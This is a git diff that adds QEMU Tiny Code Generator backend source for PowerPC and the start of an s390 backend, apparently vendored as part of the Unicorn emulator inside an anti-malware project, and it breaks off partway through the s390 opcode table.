args[1])); + break; + + case INDEX_op_add_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + do_addi_64: + tcg_out_mem_long(s, ADDI, ADD, a0, a1, a2); + } else { + tcg_out32(s, ADD | TAB(a0, a1, a2)); + } + break; + case INDEX_op_sub_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[1]) { + if (const_args[2]) { + tcg_out_movi(s, TCG_TYPE_I64, a0, a1 - a2); + } else { + tcg_out32(s, SUBFIC | TAI(a0, a2, a1)); + } + } else if (const_args[2]) { + a2 = -a2; + goto do_addi_64; + } else { + tcg_out32(s, SUBF | TAB(a0, a2, a1)); + } + break; + + case INDEX_op_shl_i64: + if (const_args[2]) { + tcg_out_shli64(s, args[0], args[1], args[2]); + } else { + tcg_out32(s, SLD | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_shr_i64: + if (const_args[2]) { + tcg_out_shri64(s, args[0], args[1], args[2]); + } else { + tcg_out32(s, SRD | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_sar_i64: + if (const_args[2]) { + int sh = SH(args[2] & 0x1f) | (((args[2] >> 5) & 1) << 1); + tcg_out32(s, SRADI | RA(args[0]) | RS(args[1]) | sh); + } else { + tcg_out32(s, SRAD | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_rotl_i64: + if (const_args[2]) { + tcg_out_rld(s, RLDICL, args[0], args[1], args[2], 0); + } else { + tcg_out32(s, RLDCL | SAB(args[1], args[0], args[2]) | MB64(0)); + } + break; + case INDEX_op_rotr_i64: + if (const_args[2]) { + tcg_out_rld(s, RLDICL, args[0], args[1], 64 - args[2], 0); + } else { + tcg_out32(s, SUBFIC | TAI(TCG_REG_R0, args[2], 64)); + tcg_out32(s, RLDCL | SAB(args[1], args[0], TCG_REG_R0) | MB64(0)); + } + break; + + case INDEX_op_mul_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out32(s, MULLI | TAI(a0, a1, a2)); + } else { + tcg_out32(s, MULLD | TAB(a0, a1, a2)); + } + break; + case INDEX_op_div_i64: + tcg_out32(s, DIVD | TAB(args[0], args[1], args[2])); + break; + case INDEX_op_divu_i64: + tcg_out32(s, DIVDU | TAB(args[0], args[1], args[2])); + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, args, false); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args, true); + break; + case INDEX_op_qemu_st_i32: + tcg_out_qemu_st(s, args, false); + break; + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args, true); + break; + + case INDEX_op_ext8s_i32: + case INDEX_op_ext8s_i64: + c = EXTSB; + goto gen_ext; + case INDEX_op_ext16s_i32: + case INDEX_op_ext16s_i64: + c = EXTSH; + goto gen_ext; + case INDEX_op_ext32s_i64: + c = EXTSW; + goto gen_ext; + gen_ext: + tcg_out32(s, c | RS(args[1]) | RA(args[0])); + break; + + case INDEX_op_setcond_i32: + tcg_out_setcond(s, TCG_TYPE_I32, args[3], args[0], args[1], args[2], + const_args[2]); + break; + case INDEX_op_setcond_i64: + tcg_out_setcond(s, TCG_TYPE_I64, args[3], args[0], args[1], args[2], + const_args[2]); + break; + case INDEX_op_setcond2_i32: + tcg_out_setcond2(s, args, const_args); + break; + + case INDEX_op_bswap16_i32: + case INDEX_op_bswap16_i64: + a0 = args[0], a1 = args[1]; + /* a1 = abcd */ + if (a0 != a1) { + /* a0 = (a1 r<< 24) & 0xff # 000c */ + tcg_out_rlw(s, RLWINM, a0, a1, 24, 24, 31); + /* a0 = (a0 & ~0xff00) | (a1 r<< 8) & 0xff00 # 00dc */ + tcg_out_rlw(s, RLWIMI, a0, a1, 8, 16, 23); + } else { + /* r0 = (a1 r<< 8) & 0xff00 # 00d0 */ + tcg_out_rlw(s, RLWINM, TCG_REG_R0, a1, 8, 16, 23); + /* a0 = (a1 r<< 24) & 0xff # 000c */ + tcg_out_rlw(s, RLWINM, a0, a1, 24, 24, 31); + /* a0 = a0 | r0 # 00dc */ + tcg_out32(s, OR | SAB(TCG_REG_R0, a0, a0)); + } + break; + + case INDEX_op_bswap32_i32: + case INDEX_op_bswap32_i64: + /* Stolen from gcc's builtin_bswap32 */ + a1 = args[1]; + a0 = args[0] == a1 ? TCG_REG_R0 : args[0]; + + /* a1 = args[1] # abcd */ + /* a0 = rotate_left (a1, 8) # bcda */ + tcg_out_rlw(s, RLWINM, a0, a1, 8, 0, 31); + /* a0 = (a0 & ~0xff000000) | ((a1 r<< 24) & 0xff000000) # dcda */ + tcg_out_rlw(s, RLWIMI, a0, a1, 24, 0, 7); + /* a0 = (a0 & ~0x0000ff00) | ((a1 r<< 24) & 0x0000ff00) # dcba */ + tcg_out_rlw(s, RLWIMI, a0, a1, 24, 16, 23); + + if (a0 == TCG_REG_R0) { + tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); + } + break; + + case INDEX_op_bswap64_i64: + a0 = args[0], a1 = args[1], a2 = TCG_REG_R0; + if (a0 == a1) { + a0 = TCG_REG_R0; + a2 = a1; + } + + /* a1 = # abcd efgh */ + /* a0 = rl32(a1, 8) # 0000 fghe */ + tcg_out_rlw(s, RLWINM, a0, a1, 8, 0, 31); + /* a0 = dep(a0, rl32(a1, 24), 0xff000000) # 0000 hghe */ + tcg_out_rlw(s, RLWIMI, a0, a1, 24, 0, 7); + /* a0 = dep(a0, rl32(a1, 24), 0x0000ff00) # 0000 hgfe */ + tcg_out_rlw(s, RLWIMI, a0, a1, 24, 16, 23); + + /* a0 = rl64(a0, 32) # hgfe 0000 */ + /* a2 = rl64(a1, 32) # efgh abcd */ + tcg_out_rld(s, RLDICL, a0, a0, 32, 0); + tcg_out_rld(s, RLDICL, a2, a1, 32, 0); + + /* a0 = dep(a0, rl32(a2, 8), 0xffffffff) # hgfe bcda */ + tcg_out_rlw(s, RLWIMI, a0, a2, 8, 0, 31); + /* a0 = dep(a0, rl32(a2, 24), 0xff000000) # hgfe dcda */ + tcg_out_rlw(s, RLWIMI, a0, a2, 24, 0, 7); + /* a0 = dep(a0, rl32(a2, 24), 0x0000ff00) # hgfe dcba */ + tcg_out_rlw(s, RLWIMI, a0, a2, 24, 16, 23); + + if (a0 == 0) { + tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); + } + break; + + case INDEX_op_deposit_i32: + if (const_args[2]) { + uint32_t mask = ((2u << (args[4] - 1)) - 1) << args[3]; + tcg_out_andi32(s, args[0], args[0], ~mask); + } else { + tcg_out_rlw(s, RLWIMI, args[0], args[2], args[3], + 32 - args[3] - args[4], 31 - args[3]); + } + break; + case INDEX_op_deposit_i64: + if (const_args[2]) { + uint64_t mask = ((2ull << (args[4] - 1)) - 1) << args[3]; + tcg_out_andi64(s, args[0], args[0], ~mask); + } else { + tcg_out_rld(s, RLDIMI, args[0], args[2], args[3], + 64 - args[3] - args[4]); + } + break; + + case INDEX_op_movcond_i32: + tcg_out_movcond(s, TCG_TYPE_I32, args[5], args[0], args[1], args[2], + args[3], args[4], const_args[2]); + break; + case INDEX_op_movcond_i64: + tcg_out_movcond(s, TCG_TYPE_I64, args[5], args[0], args[1], args[2], + args[3], args[4], const_args[2]); + break; + +#if TCG_TARGET_REG_BITS == 64 + case INDEX_op_add2_i64: +#else + case INDEX_op_add2_i32: +#endif + /* Note that the CA bit is defined based on the word size of the + environment. So in 64-bit mode it's always carry-out of bit 63. + The fallback code using deposit works just as well for 32-bit. */ + a0 = args[0], a1 = args[1]; + if (a0 == args[3] || (!const_args[5] && a0 == args[5])) { + a0 = TCG_REG_R0; + } + if (const_args[4]) { + tcg_out32(s, ADDIC | TAI(a0, args[2], args[4])); + } else { + tcg_out32(s, ADDC | TAB(a0, args[2], args[4])); + } + if (const_args[5]) { + tcg_out32(s, (args[5] ? ADDME : ADDZE) | RT(a1) | RA(args[3])); + } else { + tcg_out32(s, ADDE | TAB(a1, args[3], args[5])); + } + if (a0 != args[0]) { + tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); + } + break; + +#if TCG_TARGET_REG_BITS == 64 + case INDEX_op_sub2_i64: +#else + case INDEX_op_sub2_i32: +#endif + a0 = args[0], a1 = args[1]; + if (a0 == args[5] || (!const_args[3] && a0 == args[3])) { + a0 = TCG_REG_R0; + } + if (const_args[2]) { + tcg_out32(s, SUBFIC | TAI(a0, args[4], args[2])); + } else { + tcg_out32(s, SUBFC | TAB(a0, args[4], args[2])); + } + if (const_args[3]) { + tcg_out32(s, (args[3] ? SUBFME : SUBFZE) | RT(a1) | RA(args[5])); + } else { + tcg_out32(s, SUBFE | TAB(a1, args[5], args[3])); + } + if (a0 != args[0]) { + tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); + } + break; + + case INDEX_op_muluh_i32: + tcg_out32(s, MULHWU | TAB(args[0], args[1], args[2])); + break; + case INDEX_op_mulsh_i32: + tcg_out32(s, MULHW | TAB(args[0], args[1], args[2])); + break; + case INDEX_op_muluh_i64: + tcg_out32(s, MULHDU | TAB(args[0], args[1], args[2])); + break; + case INDEX_op_mulsh_i64: + tcg_out32(s, MULHD | TAB(args[0], args[1], args[2])); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef ppc_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + + { INDEX_op_st8_i32, { "r", "r" } }, + { INDEX_op_st16_i32, { "r", "r" } }, + { INDEX_op_st_i32, { "r", "r" } }, + + { INDEX_op_add_i32, { "r", "r", "ri" } }, + { INDEX_op_mul_i32, { "r", "r", "rI" } }, + { INDEX_op_div_i32, { "r", "r", "r" } }, + { INDEX_op_divu_i32, { "r", "r", "r" } }, + { INDEX_op_sub_i32, { "r", "rI", "ri" } }, + { INDEX_op_and_i32, { "r", "r", "ri" } }, + { INDEX_op_or_i32, { "r", "r", "ri" } }, + { INDEX_op_xor_i32, { "r", "r", "ri" } }, + { INDEX_op_andc_i32, { "r", "r", "ri" } }, + { INDEX_op_orc_i32, { "r", "r", "ri" } }, + { INDEX_op_eqv_i32, { "r", "r", "ri" } }, + { INDEX_op_nand_i32, { "r", "r", "r" } }, + { INDEX_op_nor_i32, { "r", "r", "r" } }, + + { INDEX_op_shl_i32, { "r", "r", "ri" } }, + { INDEX_op_shr_i32, { "r", "r", "ri" } }, + { INDEX_op_sar_i32, { "r", "r", "ri" } }, + { INDEX_op_rotl_i32, { "r", "r", "ri" } }, + { INDEX_op_rotr_i32, { "r", "r", "ri" } }, + + { INDEX_op_neg_i32, { "r", "r" } }, + { INDEX_op_not_i32, { "r", "r" } }, + { INDEX_op_ext8s_i32, { "r", "r" } }, + { INDEX_op_ext16s_i32, { "r", "r" } }, + { INDEX_op_bswap16_i32, { "r", "r" } }, + { INDEX_op_bswap32_i32, { "r", "r" } }, + + { INDEX_op_brcond_i32, { "r", "ri" } }, + { INDEX_op_setcond_i32, { "r", "r", "ri" } }, + { INDEX_op_movcond_i32, { "r", "r", "ri", "rZ", "rZ" } }, + + { INDEX_op_deposit_i32, { "r", "0", "rZ" } }, + + { INDEX_op_muluh_i32, { "r", "r", "r" } }, + { INDEX_op_mulsh_i32, { "r", "r", "r" } }, + +#if TCG_TARGET_REG_BITS == 64 + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + + { INDEX_op_st8_i64, { "r", "r" } }, + { INDEX_op_st16_i64, { "r", "r" } }, + { INDEX_op_st32_i64, { "r", "r" } }, + { INDEX_op_st_i64, { "r", "r" } }, + + { INDEX_op_add_i64, { "r", "r", "rT" } }, + { INDEX_op_sub_i64, { "r", "rI", "rT" } }, + { INDEX_op_and_i64, { "r", "r", "ri" } }, + { INDEX_op_or_i64, { "r", "r", "rU" } }, + { INDEX_op_xor_i64, { "r", "r", "rU" } }, + { INDEX_op_andc_i64, { "r", "r", "ri" } }, + { INDEX_op_orc_i64, { "r", "r", "r" } }, + { INDEX_op_eqv_i64, { "r", "r", "r" } }, + { INDEX_op_nand_i64, { "r", "r", "r" } }, + { INDEX_op_nor_i64, { "r", "r", "r" } }, + + { INDEX_op_shl_i64, { "r", "r", "ri" } }, + { INDEX_op_shr_i64, { "r", "r", "ri" } }, + { INDEX_op_sar_i64, { "r", "r", "ri" } }, + { INDEX_op_rotl_i64, { "r", "r", "ri" } }, + { INDEX_op_rotr_i64, { "r", "r", "ri" } }, + + { INDEX_op_mul_i64, { "r", "r", "rI" } }, + { INDEX_op_div_i64, { "r", "r", "r" } }, + { INDEX_op_divu_i64, { "r", "r", "r" } }, + + { INDEX_op_neg_i64, { "r", "r" } }, + { INDEX_op_not_i64, { "r", "r" } }, + { INDEX_op_ext8s_i64, { "r", "r" } }, + { INDEX_op_ext16s_i64, { "r", "r" } }, + { INDEX_op_ext32s_i64, { "r", "r" } }, + { INDEX_op_bswap16_i64, { "r", "r" } }, + { INDEX_op_bswap32_i64, { "r", "r" } }, + { INDEX_op_bswap64_i64, { "r", "r" } }, + + { INDEX_op_brcond_i64, { "r", "ri" } }, + { INDEX_op_setcond_i64, { "r", "r", "ri" } }, + { INDEX_op_movcond_i64, { "r", "r", "ri", "rZ", "rZ" } }, + + { INDEX_op_deposit_i64, { "r", "0", "rZ" } }, + + { INDEX_op_mulsh_i64, { "r", "r", "r" } }, + { INDEX_op_muluh_i64, { "r", "r", "r" } }, +#endif + +#if TCG_TARGET_REG_BITS == 32 + { INDEX_op_brcond2_i32, { "r", "r", "ri", "ri" } }, + { INDEX_op_setcond2_i32, { "r", "r", "r", "ri", "ri" } }, +#endif + +#if TCG_TARGET_REG_BITS == 64 + { INDEX_op_add2_i64, { "r", "r", "r", "r", "rI", "rZM" } }, + { INDEX_op_sub2_i64, { "r", "r", "rI", "rZM", "r", "r" } }, +#else + { INDEX_op_add2_i32, { "r", "r", "r", "r", "rI", "rZM" } }, + { INDEX_op_sub2_i32, { "r", "r", "rI", "rZM", "r", "r" } }, +#endif + +#if TCG_TARGET_REG_BITS == 64 + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "S", "S" } }, + { INDEX_op_qemu_ld_i64, { "r", "L" } }, + { INDEX_op_qemu_st_i64, { "S", "S" } }, +#elif TARGET_LONG_BITS == 32 + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "S", "S" } }, + { INDEX_op_qemu_ld_i64, { "L", "L", "L" } }, + { INDEX_op_qemu_st_i64, { "S", "S", "S" } }, +#else + { INDEX_op_qemu_ld_i32, { "r", "L", "L" } }, + { INDEX_op_qemu_st_i32, { "S", "S", "S" } }, + { INDEX_op_qemu_ld_i64, { "L", "L", "L", "L" } }, + { INDEX_op_qemu_st_i64, { "S", "S", "S", "S" } }, +#endif + + { -1 }, +}; + +static void tcg_target_init(TCGContext *s) +{ + unsigned long hwcap = qemu_getauxval(AT_HWCAP); + if (hwcap & PPC_FEATURE_ARCH_2_06) { + have_isa_2_06 = true; + } + + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffffffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, 0xffffffff); + tcg_regset_set32(s->tcg_target_call_clobber_regs, 0, + (1 << TCG_REG_R0) | + (1 << TCG_REG_R2) | + (1 << TCG_REG_R3) | + (1 << TCG_REG_R4) | + (1 << TCG_REG_R5) | + (1 << TCG_REG_R6) | + (1 << TCG_REG_R7) | + (1 << TCG_REG_R8) | + (1 << TCG_REG_R9) | + (1 << TCG_REG_R10) | + (1 << TCG_REG_R11) | + (1 << TCG_REG_R12)); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); /* tcg temp */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R1); /* stack pointer */ +#if defined(_CALL_SYSV) + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R2); /* toc pointer */ +#endif +#if defined(_CALL_SYSV) || TCG_TARGET_REG_BITS == 64 + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R13); /* thread pointer */ +#endif + tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP1); /* mem temp */ + if (USE_REG_RA) { + tcg_regset_set_reg(s->reserved_regs, TCG_REG_RA); /* return addr */ + } + + tcg_add_target_add_op_defs(s, ppc_op_defs); +} + +#ifdef __ELF__ +#if TCG_TARGET_REG_BITS == 64 +# define ELF_HOST_MACHINE EM_PPC64 +#else +# define ELF_HOST_MACHINE EM_PPC +#endif +#endif /* __ELF__ */ + +static size_t dcache_bsize = 16; +static size_t icache_bsize = 16; + +void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + uintptr_t p, start1, stop1; + size_t dsize = dcache_bsize; + size_t isize = icache_bsize; + + start1 = start & ~(dsize - 1); + stop1 = (stop + dsize - 1) & ~(dsize - 1); + for (p = start1; p < stop1; p += dsize) { + asm volatile ("dcbst 0,%0" : : "r"(p) : "memory"); + } + asm volatile ("sync" : : : "memory"); + + start &= start & ~(isize - 1); + stop1 = (stop + isize - 1) & ~(isize - 1); + for (p = start1; p < stop1; p += isize) { + asm volatile ("icbi 0,%0" : : "r"(p) : "memory"); + } + asm volatile ("sync" : : : "memory"); + asm volatile ("isync" : : : "memory"); +} + +#if defined _AIX +#include + +INITIALIZER(tcg_cache_init) +{ + icache_bsize = _system_configuration.icache_line; + dcache_bsize = _system_configuration.dcache_line; +} + +#elif defined __linux__ +INITIALIZER(tcg_cache_init) +{ + unsigned long dsize = qemu_getauxval(AT_DCACHEBSIZE); + unsigned long isize = qemu_getauxval(AT_ICACHEBSIZE); + + if (dsize == 0 || isize == 0) { + if (dsize == 0) { + fprintf(stderr, "getauxval AT_DCACHEBSIZE failed\n"); + } + if (isize == 0) { + fprintf(stderr, "getauxval AT_ICACHEBSIZE failed\n"); + } + exit(1); + } + dcache_bsize = dsize; + icache_bsize = isize; +} + +#elif defined __APPLE__ +#include +#include +#include + +INITIALIZER(tcg_cache_init) +{ + size_t len; + unsigned cacheline; + int name[2] = { CTL_HW, HW_CACHELINE }; + + len = sizeof(cacheline); + if (sysctl(name, 2, &cacheline, &len, NULL, 0)) { + perror("sysctl CTL_HW HW_CACHELINE failed"); + exit(1); + } + dcache_bsize = cacheline; + icache_bsize = cacheline; +} + +#elif defined(__FreeBSD__) || defined(__FreeBSD_kernel__) +#include +#include +#include +#include +#include +#include + +INITIALIZER(tcg_cache_init) +{ + size_t len = 4; + unsigned cacheline; + + if (sysctlbyname ("machdep.cacheline_size", &cacheline, &len, NULL, 0)) { + fprintf(stderr, "sysctlbyname machdep.cacheline_size failed: %s\n", + strerror(errno)); + exit(1); + } + dcache_bsize = cacheline; + icache_bsize = cacheline; +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.h new file mode 100644 index 0000000..32ac442 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.h @@ -0,0 +1,111 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TCG_TARGET_PPC64 +#define TCG_TARGET_PPC64 1 + +#ifdef _ARCH_PPC64 +# define TCG_TARGET_REG_BITS 64 +#else +# define TCG_TARGET_REG_BITS 32 +#endif + +#define TCG_TARGET_NB_REGS 32 +#define TCG_TARGET_INSN_UNIT_SIZE 4 + +typedef enum { + TCG_REG_R0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, + TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, + TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, + TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15, + TCG_REG_R16, TCG_REG_R17, TCG_REG_R18, TCG_REG_R19, + TCG_REG_R20, TCG_REG_R21, TCG_REG_R22, TCG_REG_R23, + TCG_REG_R24, TCG_REG_R25, TCG_REG_R26, TCG_REG_R27, + TCG_REG_R28, TCG_REG_R29, TCG_REG_R30, TCG_REG_R31, + + TCG_REG_CALL_STACK = TCG_REG_R1, + TCG_AREG0 = TCG_REG_R27 +} TCGReg; + +/* optional instructions automatically implemented */ +#define TCG_TARGET_HAS_ext8u_i32 0 /* andi */ +#define TCG_TARGET_HAS_ext16u_i32 0 + +/* optional instructions */ +#define TCG_TARGET_HAS_div_i32 1 +#define TCG_TARGET_HAS_rem_i32 0 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_andc_i32 1 +#define TCG_TARGET_HAS_orc_i32 1 +#define TCG_TARGET_HAS_eqv_i32 1 +#define TCG_TARGET_HAS_nand_i32 1 +#define TCG_TARGET_HAS_nor_i32 1 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 0 +#define TCG_TARGET_HAS_muls2_i32 0 +#define TCG_TARGET_HAS_muluh_i32 1 +#define TCG_TARGET_HAS_mulsh_i32 1 + +#if TCG_TARGET_REG_BITS == 64 +#define TCG_TARGET_HAS_add2_i32 0 +#define TCG_TARGET_HAS_sub2_i32 0 +#define TCG_TARGET_HAS_trunc_shr_i32 0 +#define TCG_TARGET_HAS_div_i64 1 +#define TCG_TARGET_HAS_rem_i64 0 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 0 +#define TCG_TARGET_HAS_ext16u_i64 0 +#define TCG_TARGET_HAS_ext32u_i64 0 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_not_i64 1 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_andc_i64 1 +#define TCG_TARGET_HAS_orc_i64 1 +#define TCG_TARGET_HAS_eqv_i64 1 +#define TCG_TARGET_HAS_nand_i64 1 +#define TCG_TARGET_HAS_nor_i64 1 +#define TCG_TARGET_HAS_deposit_i64 1 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 1 +#define TCG_TARGET_HAS_mulsh_i64 1 +#endif + +void flush_icache_range(uintptr_t start, uintptr_t stop); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.c new file mode 100644 index 0000000..cfa8987 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.c @@ -0,0 +1,2346 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2009 Ulrich Hecht + * Copyright (c) 2009 Alexander Graf + * Copyright (c) 2010 Richard Henderson + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg-be-ldst.h" + +/* We only support generating code for 64-bit mode. */ +#if TCG_TARGET_REG_BITS != 64 +#error "unsupported code generation mode" +#endif + +#include "elf.h" + +/* ??? The translation blocks produced by TCG are generally small enough to + be entirely reachable with a 16-bit displacement. Leaving the option for + a 32-bit displacement here Just In Case. */ +#define USE_LONG_BRANCHES 0 + +#define TCG_CT_CONST_MULI 0x100 +#define TCG_CT_CONST_ORI 0x200 +#define TCG_CT_CONST_XORI 0x400 +#define TCG_CT_CONST_CMPI 0x800 +#define TCG_CT_CONST_ADLI 0x1000 + +/* Several places within the instruction set 0 means "no register" + rather than TCG_REG_R0. */ +#define TCG_REG_NONE 0 + +/* A scratch register that may be be used throughout the backend. */ +#define TCG_TMP0 TCG_REG_R14 + +#ifdef CONFIG_USE_GUEST_BASE +#define TCG_GUEST_BASE_REG TCG_REG_R13 +#else +#define TCG_GUEST_BASE_REG TCG_REG_R0 +#endif + +#ifndef GUEST_BASE +#define GUEST_BASE 0 +#endif + + +/* All of the following instructions are prefixed with their instruction + format, and are defined as 8- or 16-bit quantities, even when the two + halves of the 16-bit quantity may appear 32 bits apart in the insn. + This makes it easy to copy the values from the tables in Appendix B. */ +typedef enum S390Opcode { + RIL_AFI = 0xc209, + RIL_AGFI = 0xc208, + RIL_ALFI = 0xc20b, + RIL_ALGFI = 0xc20a, + RIL_BRASL = 0xc005, + RIL_BRCL = 0xc004, + RIL_CFI = 0xc20d, + RIL_CGFI = 0xc20c, + RIL_CLFI = 0xc20f, + RIL_CLGFI = 0xc20e, + RIL_IIHF = 0xc008, + RIL_IILF = 0xc009, + RIL_LARL = 0xc000, + RIL_LGFI = 0xc001, + RIL_LGRL = 0xc408, + RIL_LLIHF = 0xc00e, + RIL_LLILF = 0xc00f, + RIL_LRL = 0xc40d, + RIL_MSFI = 0xc201, + RIL_MSGFI = 0xc200, + RIL_NIHF = 0xc00a, + RIL_NILF = 0xc00b, + RIL_OIHF = 0xc00c, + RIL_OILF = 0xc00d, + RIL_SLFI = 0xc205, + RIL_SLGFI = 0xc204, + RIL_XIHF = 0xc006, + RIL_XILF = 0xc007, + + RI_AGHI = 0xa70b, + RI_AHI = 0xa70a, + RI_BRC = 0xa704, + RI_IIHH = 0xa500, + RI_IIHL = 0xa501, + RI_IILH = 0xa502, + RI_IILL = 0xa503, + RI_LGHI = 0xa709, + RI_LLIHH = 0xa50c, + RI_LLIHL = 0xa50d, + RI_LLILH = 0xa50e, + RI_LLILL = 0xa50f, + RI_MGHI = 0xa70d, + RI_MHI = 0xa70c, + RI_NIHH = 0xa504, + RI_NIHL = 0xa505, + RI_NILH = 0xa506, + RI_NILL = 0xa507, + RI_OIHH = 0xa508, + RI_OIHL = 0xa509, + RI_OILH = 0xa50a, + RI_OILL = 0xa50b, + + RIE_CGIJ = 0xec7c, + RIE_CGRJ = 0xec64, + RIE_CIJ = 0xec7e, + RIE_CLGRJ = 0xec65, + RIE_CLIJ = 0xec7f, + RIE_CLGIJ = 0xec7d, + RIE_CLRJ = 0xec77, + RIE_CRJ = 0xec76, + RIE_RISBG = 0xec55, + + RRE_AGR = 0xb908, + RRE_ALGR = 0xb90a, + RRE_ALCR = 0xb998, + RRE_ALCGR = 0xb988, + RRE_CGR = 0xb920, + RRE_CLGR = 0xb921, + RRE_DLGR = 0xb987, + RRE_DLR = 